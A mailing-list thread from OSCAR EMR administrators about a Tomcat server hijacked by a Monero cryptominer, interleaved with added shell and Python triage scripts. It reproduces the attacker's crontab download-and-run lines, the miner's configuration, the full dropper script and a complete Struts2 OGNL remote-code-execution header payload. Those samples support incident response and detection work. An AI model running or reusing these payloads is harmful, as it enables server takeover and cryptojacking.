Tomcat Vulnerability - Will bring down tomcat server

muki
It happens that one of my servers was compromised by a Russian hacker. It took a long time before I was able to solve the
problem. Hopefully the following will help others. If Tomcat shuts down without any log left behind you might
be having the same problem. Their app will use 99% of your CPU and prevent other apps from running.
I am still trying to see how they got into my system without a trace, but I believe they are using the tomcat
user to create a crontab that connects to their site. The content of the crontab is below.
 
*/9 * * * * wget -O - -q http://91.230.47.40/common/logo.jpg|sh
*/10 * * * * curl http://91.230.47.40/common/logo.jpg|sh
 
They used the name of a known Linux program (i.e. iscsid) to make it difficult to detect.
They installed the program under /var/tmp and used the tomcat user to run it with the configuration file below.
 
{
    "url" : "stratum+tcp://37.59.51.212:80",
    "user" : "43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
 
Solution:
If you delete the folder it will be created again via the crontab.
If you delete the crontab it will find a way to log in and create another one if your system is already compromised.
 
The solution that I found effective is to deny crontab service to tomcat (tomcat6, tomcat7 or whatever tomcat version you are using)
and assign a long password to your tomcat user.
 
Use "netstat -Wcatnp" to check if your system is still connected to their site (look for any of the IP addresses above)
and kill the process.
 
Muki

------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Oscarmcmaster-devel mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/oscarmcmaster-devel
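A small offline triage helper for the checks Muki describes, added here as an example (it is not from Muki's post or from the OSCAR project). The two IP addresses come from the post and are specific to this intrusion; the sample crontab, netstat and ps lines are constructed to exercise the helpers, and the miner's command line in the ps sample is an assumption. The functions read text rather than running commands, so on a live host the same functions can be fed from `crontab -l`, `netstat -Wtanp` (a single pass; the `-c` in Muki's `netstat -Wcatnp` makes netstat loop continuously, which is awkward to pipe) or `ps -eo user,pid,args`.

```shell
#!/bin/sh
# Added example (not from the original post): offline triage helpers for the symptoms
# described in the thread. Each helper reads text on stdin so it can be fed from
# `crontab -l`, `netstat -Wtanp` / `ss -tnp`, or `ps -eo user,pid,args`, or from samples.

# Indicators taken from the post; specific to this intrusion, not general rules.
BAD_IPS="91.230.47.40 37.59.51.212"

# Print non-comment crontab lines that pipe wget/curl output straight into sh or bash.
flag_download_and_exec() {
    awk '!/^[[:space:]]*#/ && /(wget|curl)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)/ { print "CRON: " $0 }'
}

# Print connection lines whose local or foreign address is one of the IPs in $1 (any port).
flag_bad_connections() {
    awk -v ips="$1" '
        BEGIN { n = split(ips, a, " "); for (i = 1; i <= n; i++) bad[a[i]] = 1 }
        {
            for (f = 1; f <= NF; f++) {
                ip = $f; sub(/:[0-9]+$/, "", ip)      # drop the :port suffix
                if (ip in bad) { print "NET: " $0; break }
            }
        }'
}

# Print process lines (header skipped) whose command line references /tmp/ or /var/tmp/.
flag_tmp_processes() {
    awk 'NR > 1 && /\/tmp\// { print "PROC: " $0 }'
}

# Constructed samples modelled on the indicators in the post. The miner's command line is
# an assumption; the OSCAR backup job and the java process are included as negative cases.
SAMPLE_CRONTAB='01 23 * * * /usr/share/oscar-emr/oscar_backup.sh
*/9 * * * * wget -O - -q http://91.230.47.40/common/logo.jpg|sh
*/10 * * * * curl http://91.230.47.40/common/logo.jpg|sh
# */5 * * * * curl http://example.invalid/x | sh'

SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 10.0.0.5:51322          37.59.51.212:80         ESTABLISHED 2143/iscsid
tcp        0      0 10.0.0.5:8443           203.0.113.7:50112       ESTABLISHED 1190/java'

SAMPLE_PS='USER       PID COMMAND
tomcat7   2143 /var/tmp/iscsid -c /var/tmp/jmvsmwoia.conf
tomcat7   1190 /usr/lib/jvm/java-7-openjdk-amd64/bin/java -Dcatalina.base=/var/lib/tomcat7'

# Run the three checks against the constructed samples.
triage_samples() {
    printf '%s\n' "$SAMPLE_CRONTAB" | flag_download_and_exec
    printf '%s\n' "$SAMPLE_NETSTAT" | flag_bad_connections "$BAD_IPS"
    printf '%s\n' "$SAMPLE_PS"      | flag_tmp_processes
}

# Run the same checks on the live host (needs root to read every user's crontab).
triage_live() {
    for u in $(cut -d: -f1 /etc/passwd); do
        crontab -u "$u" -l 2>/dev/null | flag_download_and_exec | sed "s/^CRON:/CRON($u):/"
    done
    cat /etc/crontab /etc/cron.d/* 2>/dev/null | flag_download_and_exec
    (netstat -Wtanp 2>/dev/null || ss -tnp) | flag_bad_connections "$BAD_IPS"
    ps -eo user,pid,args | flag_tmp_processes
}

case "${1:-}" in
    --live) triage_live ;;
    --demo) triage_samples ;;
esac
```

Saved as, say, triage.sh (an assumed name), `sh triage.sh --demo` flags the two download-and-execute cron lines, the connection to the stratum pool and the process running from /var/tmp, and `sudo sh triage.sh --live` runs the same checks on the host. Matching on the two IPs only catches this particular campaign; the pipe-to-shell and /tmp checks are the durable part.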
Re: Tomcat Vulnerability - Will bring down tomcat server

Peter Hutten-Czapski-2
google stealth Monero miner

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 14:12, <[hidden email]> wrote:
Re: Tomcat Vulnerability - Will bring down tomcat server

Colcamex Resources Inc.
In reply to this post by muki
Thanks for this, Muki.

So you’re saying that anyone can gain access to the server via the Tomcat user and create cron jobs? This is scary to know given the set-up of most of our servers.

________

Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________

Dennis Warren
Consultant
Colcamex Resources
[hidden email]
778.386.9264

On May 29, 2017, at 11:12 AM, <[hidden email]> <[hidden email]> wrote:

Re: Tomcat Vulnerability - Will bring down tomcat server

Thom Luxford-4
One way to blacklist a user to cron is:

echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny


On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
--
+
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
(866) 922-6348, ext 101

Re: Tomcat Vulnerability - Will bring down tomcat server

Peter Hutten-Czapski-2
Excellent idea Thom, we don't need tomcat to run crontab.
sudo crontab -u tomcat7 -e
will show if you have tomcat7 running anything
and will be denied if you have set up the deny as suggested.


On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
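The access-control rules behind Thom's cron.deny one-liner and Peter's crontab -u check, as an added example (not from either post or from the OSCAR packaging). It assumes the Vixie/Debian cron semantics documented in crontab(1): if cron.allow exists, only the users listed in it may use the crontab command and cron.deny is ignored; otherwise users listed in cron.deny are refused; if neither file exists, everyone may use it. The file paths are parameters so the functions can be exercised against temporary files before touching /etc.

```shell
#!/bin/sh
# Added example (not from the original thread): manage cron.deny idempotently and evaluate
# cron.allow / cron.deny the way crontab(1) does on Vixie/Debian cron (assumed semantics):
#   - cron.allow exists      -> only users listed in it may use crontab(1)
#   - else cron.deny exists  -> users listed in it may not
#   - neither exists         -> everyone may (Debian default)
# These files gate the crontab(1) command only; a crontab already installed in the spool
# keeps running until it is removed with `crontab -u <user> -r`.

# user_listed FILE USER -> success if USER is a whole line of FILE.
user_listed() {
    [ -f "$1" ] && grep -qxF "$2" "$1"
}

# cron_access ALLOW_FILE DENY_FILE USER -> prints "allowed" or "denied".
cron_access() {
    allow=$1 deny=$2 user=$3
    if [ -f "$allow" ]; then
        if user_listed "$allow" "$user"; then echo allowed; else echo denied; fi
    elif user_listed "$deny" "$user"; then
        echo denied
    else
        echo allowed
    fi
}

# deny_cron_user DENY_FILE USER -> add USER once. Unlike `echo -e ... >>`, repeated runs
# do not duplicate the entry or leave blank lines, and it works under dash as well as bash.
deny_cron_user() {
    deny=$1 user=$2
    if ! user_listed "$deny" "$user"; then
        printf '%s\n' "$user" >> "$deny"
    fi
}

# Walk through the rules on throwaway files.
demo() {
    tmp=$(mktemp -d)
    deny_cron_user "$tmp/cron.deny" tomcat6
    deny_cron_user "$tmp/cron.deny" tomcat7
    deny_cron_user "$tmp/cron.deny" tomcat7                          # no-op
    echo "tomcat7 with deny only:   $(cron_access "$tmp/cron.allow" "$tmp/cron.deny" tomcat7)"
    echo "backup  with deny only:   $(cron_access "$tmp/cron.allow" "$tmp/cron.deny" backup)"
    printf 'backup\n' > "$tmp/cron.allow"                            # allow file now wins
    echo "tomcat7 with allow file:  $(cron_access "$tmp/cron.allow" "$tmp/cron.deny" tomcat7)"
    echo "www-data with allow file: $(cron_access "$tmp/cron.allow" "$tmp/cron.deny" www-data)"
    echo "cron.deny lines: $(grep -c . "$tmp/cron.deny")"
    rm -rf "$tmp"
}

case "${1:-}" in --demo) demo ;; esac
```

On the real host the calls are `deny_cron_user /etc/cron.deny tomcat7` and `cron_access /etc/cron.allow /etc/cron.deny tomcat7`. Two caveats: on Debian's cron the deny file stops the tomcat7 account from running crontab(1), but the daemon still executes whatever is already in /var/spool/cron/crontabs, so list it (`crontab -u tomcat7 -l`) and remove it (`crontab -u tomcat7 -r`) as a separate step; and read that listing before removing it, because a package may have installed legitimate jobs under the same user.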
Re: Tomcat Vulnerability - Will bring down tomcat server

Marc Dumontier
Which Tomcat version was running which allowed the system to get compromised?


On Mon, May 29, 2017 at 4:03 PM, Peter Hutten-Czapski <[hidden email]> wrote:
Re: Tomcat Vulnerability - Will bring down tomcat server

Colcamex Resources Inc.
I believe it may be worth our effort to learn HOW the Tomcat6/7 user was used to gain access to the server. It’s not the cron job service that we should be concerned with.

Cryptonight (“the virus”) requires a sudoer to install.
  

On May 29, 2017, at 1:08 PM, Marc Dumontier <[hidden email]> wrote:

Re: Tomcat Vulnerability - Will bring down tomcat server

Duncan Rozario
Wouldn't /var/log/auth.log show the unauthorized access to the system, and the user?
Duncan
Re: Tomcat Vulnerability - Will bring down tomcat server

Luiz Rufato
In reply to this post by Peter Hutten-Czapski-2

Actually, we do.

01 23 * * * /usr/share/oscar-emr/oscar_backup.sh
* * * * * /usr/share/oscar-emr/reOscar.sh
* * * * * /usr/share/oscar-emr/gateway.cron
00 23 * * Fri touch /tmp/tomcat7-tomcat7-tmp/restartOscar.action

This was installed by the .deb.

I will research a bit more.


On 29-05-2017 17:03, Peter Hutten-Czapski wrote:
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Re: Tomcat Vulnerability - Will bring down tomcat server

Luiz Rufato

Virus code:


rufato@aton:~$ cat logo.jpg
#!/bin/sh
rm -rf /var/tmp/jmvsmwoia.conf
rm -rf /var/tmp/iscsid
ps auxf|grep -v grep|grep -v mgvdhrhyo|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "jmvsmwoia"|awk '{print $2}'|xargs kill -9
ps -fe|grep mgvdhrhyo|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /var/tmp/mgvdhrhyo.conf
rm -rf /var/tmp/mgvdhrhyo.conf
curl -o /var/tmp/mgvdhrhyo.conf http://91.230.47.40/common/kworker.conf
wget -O /var/tmp/mgvdhrhyo.conf http://91.230.47.40/common/kworker.conf
chmod 777 /var/tmp/acpid
rm -rf /var/tmp/acpid
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /var/tmp/acpid http://91.230.47.40/common/kworker
wget -O /var/tmp/acpid http://91.230.47.40/common/kworker
else
curl -o /var/tmp/acpid http://91.230.47.40/common/kworker_na
wget -O /var/tmp/acpid http://91.230.47.40/common/kworker_na
fi
chmod +x /var/tmp/acpid
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./acpid -c mgvdhrhyo.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi


On 29-05-2017 19:35, Luiz Rufato wrote:

Actually we do.

01 23 * * * /usr/share/oscar-emr/oscar_backup.sh
* * * * * /usr/share/oscar-emr/reOscar.sh
* * * * * /usr/share/oscar-emr/gateway.cron
00 23 * * Fri touch /tmp/tomcat7-tomcat7-tmp/restartOscar.action

This was installed by the .deb.

I will research a bit more.


On 29-05-2017 17:03, Peter Hutten-Czapski wrote:
excellent idea Thom, we don't need tomcat to run crontab
sudo crontab -u tomcat7 -e
will show if you have tomcat7 running anything
and will be denied if you have set up the deny as suggested

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
One way to blacklist a user to cron is:

printf 'tomcat6\ntomcat7\n' >> /etc/cron.deny


On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
Thanks for this Muki.

So you’re saying that anyone can gain access to the server via the Tomcat user and create cron jobs? This is scary to know given the set-up of most of our servers.

________

Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________

Dennis Warren
Consultant
Colcamex Resources
[hidden email]
778.386.9264

--
+
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
(866) 922-6348, ext 101


Re: Tomcat Vulnerability - Will bring down tomcat server

Luiz Rufato
In reply to this post by Peter Hutten-Czapski-2

Thank you Muki.

Why do you think the tomcat7 user was used by the attacker?


Possible explanation:

http://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-887/year-2017/opec-1/Apache-Tomcat.html


On 29-05-2017 15:41, Peter Hutten-Czapski wrote:
google stealth Monero miner


Re: [Oscarmcmaster-bc-users] Tomcat Vulnerability - Will bring down tomcat server

muki
In reply to this post by Peter Hutten-Czapski-2
It happens on both tomcat6 and tomcat7.
 
Sent: Monday, May 29, 2017 1:08 PM
Subject: Re: [Oscarmcmaster-bc-users] [Oscarmcmaster-devel] Tomcat Vulnerability - Will bring down tomcat server
 
Which Tomcat version was running which allowed the system to get compromised?
--
Marc Dumontier
519-584-5601
http://www.hxb.ca
http://www.oscarmcmaster.org
 



Re: Tomcat Vulnerability - Will bring down tomcat server

muki
In reply to this post by Marc Dumontier
I am trying to see how they gain access to the server without root privilege
 
Sent: Monday, May 29, 2017 1:56 PM
Subject: Re: [Oscarmcmaster-devel] Tomcat Vulnerability - Will bring down tomcat server
 
I believe it may be worth our effort to learn HOW the Tomcat6/7 user was used to gain access to the server. It’s not the cron job service that we should be concerned with.
 
Cryptonight (“the virus”) requires SUDOer to install.
  

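Dennis's question is the right one and the thread never answers it; what the thread does give is a containment recipe, and that can at least be made safe to repeat and easy to verify. The script below is an added example, not code from the thread. It appends to cron.deny only when the name is not there yet (the one-line append quoted earlier adds the names again every time it is run), evaluates the rule crontab(1) applies (if cron.allow exists only its members may use crontab and cron.deny is ignored; otherwise members of cron.deny may not), and wraps the rest of the advice in a root-only lock-down: save and remove any crontab the account already has, because cron.deny controls who may run the crontab command and does not remove a crontab already in the spool, lock the password rather than picking a long one, and drop the login shell. Two caveats: on an OSCAR host the backup and restart jobs Luiz listed must be re-homed first if they sit in the tomcat7 crontab, and the denial should be tested as the service account (`su -s /bin/sh -c 'crontab -l' tomcat7`), since cron.deny restricts whoever invokes crontab, not the account root names with -u. File paths are parameters so the logic can be run against scratch files; the account names and the /usr/sbin/nologin path are Debian assumptions.

```sh
#!/bin/sh
# Added example, not code from the thread: idempotent cron.deny handling,
# the crontab(1) allow/deny rule, and a lock-down routine for Tomcat
# service accounts. File paths are parameters so the logic can be tested
# on scratch files; the live routine needs root.

# Add USER to DENY_FILE (default /etc/cron.deny) once. grep -x -F matches
# the whole line literally, so a second call is a no-op.
cron_deny_add() {
    user=$1
    deny=${2:-/etc/cron.deny}
    [ -f "$deny" ] || : > "$deny"
    grep -qxF "$user" "$deny" || printf '%s\n' "$user" >> "$deny"
}

# Print "allowed" or "denied" for USER under the crontab(1) rule:
# if cron.allow exists only users listed in it may use crontab;
# otherwise users listed in cron.deny may not; if neither file exists
# the default is build-dependent (Debian allows everyone; assumed here).
cron_access() {
    user=$1
    allow=${2:-/etc/cron.allow}
    deny=${3:-/etc/cron.deny}
    if [ -f "$allow" ]; then
        if grep -qxF "$user" "$allow"; then echo allowed; else echo denied; fi
    elif [ -f "$deny" ] && grep -qxF "$user" "$deny"; then
        echo denied
    else
        echo allowed
    fi
}

# Contain the service accounts named on the command line (root only):
#  1. keep a copy of any crontab the account has, then delete it, because
#     cron.deny blocks the crontab command but does not touch the spool;
#  2. deny the crontab command;
#  3. lock the password and remove the login shell (Debian path assumed).
# On an OSCAR host, re-home the backup/restart jobs quoted in the thread
# before step 1 if they live in the tomcat7 crontab.
lockdown_tomcat_cron() {
    evidence=${EVIDENCE_DIR:-/root/ir-evidence}
    mkdir -p "$evidence"
    for u in "$@"; do
        id "$u" >/dev/null 2>&1 || { echo "$u: no such account"; continue; }
        if crontab -u "$u" -l > "$evidence/crontab.$u" 2>/dev/null; then
            echo "$u: crontab saved to $evidence/crontab.$u, removing"
            crontab -u "$u" -r
        else
            rm -f "$evidence/crontab.$u"
        fi
        cron_deny_add "$u"
        passwd -l "$u" >/dev/null
        usermod -s /usr/sbin/nologin "$u"
        echo "$u: crontab now $(cron_access "$u"), shell $(getent passwd "$u" | cut -d: -f7)"
    done
}

# Usage (as root): sh this_script.sh --apply tomcat6 tomcat7
# Without --apply the script only demonstrates the logic on scratch files.
if [ "${1:-}" = "--apply" ]; then
    shift
    lockdown_tomcat_cron "$@"
else
    d=$(mktemp -d)
    cron_deny_add tomcat7 "$d/cron.deny"
    cron_deny_add tomcat7 "$d/cron.deny"
    echo "cron.deny after two adds: $(tr '\n' ' ' < "$d/cron.deny")"
    echo "tomcat7: $(cron_access tomcat7 "$d/cron.allow" "$d/cron.deny")"
    echo "root:    $(cron_access root "$d/cron.allow" "$d/cron.deny")"
    rm -rf "$d"
fi
```

The saved crontab is evidence as much as a backup: it is the cleanest record of what the attacker scheduled and when it was installed (the spool file's mtime), so keep it with the rest of the incident notes rather than deleting it once the host is clean.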
Re: Tomcat Vulnerability - Will bring down tomcat server

Colcamex Resources Inc.
Does Oscar 12 have the admin module that lets users make cron jobs? 


Re: Tomcat Vulnerability - Will bring down tomcat server

Luiz Rufato
In reply to this post by muki

The virus code does not use any kind of root access or escalated privileges. Looks like simple commands any user can enter.

My servers are clean. What are your firewall access rules and what services do you run on this machine? Is this a dedicated server?



Em 29-05-2017 20:07, [hidden email] escreveu:
I am trying to see how they gain access to the server without root privilege
 
Sent: Monday, May 29, 2017 1:56 PM
Subject: Re: [Oscarmcmaster-devel] Tomcat Vulnerability - Will bring down tomcat server
 
I believe it may be worth our effort to learn HOW the Tomcat6/7 user was used to gain access to the server. It's not the cron job service that we should be concerned with.
 
Cryptonight ("the virus") requires sudoer to install.
  
________
 
Join the Community of OSCAR members at OSCAR CON 2017 Roadshow
Vancouver Island:  www.eply.com/oscarconvancouverisland
Vancouver:  www.eply.com/oscarconvancouver
________
 
Dennis Warren
Consultant
Colcamex Resources
[hidden email]
778.386.9264
 
On May 29, 2017, at 1:08 PM, Marc Dumontier <[hidden email]> wrote:
 
Which Tomcat version was running which allowed the system to get compromised?
 
 
On Mon, May 29, 2017 at 4:03 PM, Peter Hutten-Czapski <[hidden email]> wrote:
Excellent idea Thom, we don't need tomcat to run crontab.
sudo crontab -u tomcat7 -e
will show if you have tomcat7 running anything,
and will be denied if you have set up the deny as suggested.

================
Peter Hutten-Czapski
Haileybury Ontario

"The attitude that ‘if rural people want these services they’ll have to come to the city to get them’ is simply not acceptable…” (Newbery, 1999)

Before printing, think about the environment. Avant d' imprimer, pensez à l'environnement.

On 29 May 2017 at 15:48, Thom Luxford <[hidden email]> wrote:
One way to blacklist a user from cron is:
 
echo -e "tomcat6\ntomcat7\n" >> /etc/cron.deny
 
 
On Mon, May 29, 2017 at 12:29 PM, Colcamex Resources Inc. <[hidden email]> wrote:
Thanks for this, Muki.
 
So you're saying that anyone can gain access to the server via the Tomcat user and create cron jobs? This is scary to know given the set-up of most of our servers.
 
 
--
Thom Luxford, B.HK B.CS
Project Manager IT
bCMDit Services Ltd.
(866) 922-6348, ext 101

--
Marc Dumontier
519-584-5601
http://www.hxb.ca
http://www.oscarmcmaster.org
 

Re: Tomcat Vulnerability - Will bring down tomcat server

Darius Opensource-2
In reply to this post by muki
The "virus" is a Bitcoin miner.
To mine Bitcoins, you need CPU cycles. A miner will suck the life out
of a CPU denying service to other processes.
As for the entry vector, it is hard to say without more specifics.
The OP is being cagey about that.

Darius



Re: Tomcat Vulnerability - Will bring down tomcat server

ianpun
As for the entry vector, did someone have access as the tomcat user or the root user (which should be disabled)? I run my cron backup script as a regular oscar user (mysqldump, rsync), not root or tomcat. I am still using the denyhosts daemon for blacklisting brute-force SSH attacks, and the SSH port is not the standard 22.

Ian

Re: Tomcat Vulnerability - Will bring down tomcat server

senendds
I'm suffering the same attack. I've a webapp using struts2, and I've this in my logs:

org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh\n*/19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh" | crontab -;wget -O - -q http://91.230.47.40/icons/logo.jpg|sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

I guess the attacker is using a form to send some content to a Struts action; that content is parsed by OGNL and, as a result, the crontab is created.

The funny thing is that even with the tomcat user in the cron.deny file, the attack is still happening.

Re: Tomcat Vulnerability - Will bring down tomcat server

Peter Hutten-Czapski-2
I have been looking into this.
I don't know if this is it, but there is a known Struts vulnerability.
All the hacker needs to do is to access Tomcat, and then they can address arbitrary code as the tomcat user provided in the URL. The affected parser mishandles file upload, which lets remote attackers execute arbitrary commands via a #cmd= string in a specially crafted Content-Type HTTP header.


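As an added example (not code from the thread or the OSCAR project), the following Python triage helpers pull the shell command, download URLs and cron entries out of a log line like the one senendds quoted, flag crontab entries of the wget/curl-piped-into-sh shape shown earlier in the thread, and check whether a user is listed in /etc/cron.deny as Thom suggested. The sample log line and crontab are constructed from the thread's quoted ones; the function and marker names are my own.

```python
"""Triage helpers for the Struts/OGNL cron-miner pattern discussed in this thread.
Added example, not code from the thread or the OSCAR project; sample inputs are
constructed from the log entry and crontab quoted in the thread."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Fragments typical of OGNL command-execution payloads carried in a
# Content-Type header (compare the FileUploadBase exception quoted above).
OGNL_MARKERS = ("%{", "#_memberAccess", "OgnlContext", "ProcessBuilder", "#cmd=")
# A crontab entry or shell fragment that fetches a URL and pipes it into a shell.
PIPE_TO_SHELL = re.compile(r"\b(wget|curl)\b[^|\n]*\|\s*(sh|bash)\b")
URL_RE = re.compile(r"https?://[^\s'\"|]+")
# The #cmd='...' string literal inside the OGNL expression (backslash escapes allowed).
CMD_RE = re.compile(r"#cmd='((?:[^'\\]|\\.)*)'")

@dataclass
class Finding:
    ognl_markers: List[str]   # which payload markers were present
    command: Optional[str]    # the shell command the payload tries to run
    urls: List[str]           # download URLs, for blocking and log correlation
    cron_lines: List[str]     # crontab entries the command installs

def analyze_log_line(line: str) -> Optional[Finding]:
    """Return a Finding if `line` carries an OGNL payload, else None."""
    hits = [m for m in OGNL_MARKERS if m in line]
    if not hits:
        return None
    m = CMD_RE.search(line)
    # The payload writes "\n" literally; expand it to split the cron entries.
    command = m.group(1).replace("\\n", "\n") if m else None
    urls = sorted(set(URL_RE.findall(command if command else line)))
    cron_lines = [c for c in (command or "").splitlines() if PIPE_TO_SHELL.search(c)]
    return Finding(hits, command, urls, cron_lines)

def suspicious_crontab_entries(crontab_text: str) -> List[str]:
    """From `crontab -l -u <user>` output, return entries piping remote content into a shell."""
    entries = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and PIPE_TO_SHELL.search(line):
            entries.append(line)
    return entries

def user_is_denied(cron_deny_text: str, user: str) -> bool:
    """True if `user` is listed in /etc/cron.deny content (one user name per line)."""
    return user in {u.strip() for u in cron_deny_text.splitlines() if u.strip()}

# Constructed sample: a shortened form of the exception quoted in the thread.
SAMPLE_LOG = (
    "org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: "
    "the request doesn't contain a multipart/form-data or multipart/form-data "
    "stream, content type header is %{(#_='multipart/form-data')."
    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#cmd='echo \"*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh\\n"
    "*/19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh\" | crontab -;"
    "wget -O - -q http://91.230.47.40/icons/logo.jpg|sh')."
    "(#p=new java.lang.ProcessBuilder(#cmds)).(#process=#p.start())}"
)
# Note the trailing ';wget ... |sh': the payload also runs the downloaded script
# directly, so an /etc/cron.deny entry alone does not stop that first execution.

# Constructed sample crontab in the shape the thread's first post shows.
SAMPLE_CRONTAB = """# m h dom mon dow command
*/9 * * * * wget -O - -q http://91.230.47.40/common/logo.jpg|sh
*/10 * * * * curl http://91.230.47.40/common/logo.jpg|sh
0 3 * * * /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    print(analyze_log_line(SAMPLE_LOG))
    print(suspicious_crontab_entries(SAMPLE_CRONTAB))
```

Run it against real Tomcat/catalina logs and `crontab -l -u tomcat7` output to find the same payload shape; the URLs it returns are what to block and search for in proxy logs.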

Re: Tomcat Vulnerability - Will bring down tomcat server

Peter Hutten-Czapski-2
If so, should we be taking down publicly (web) facing OSCARs?

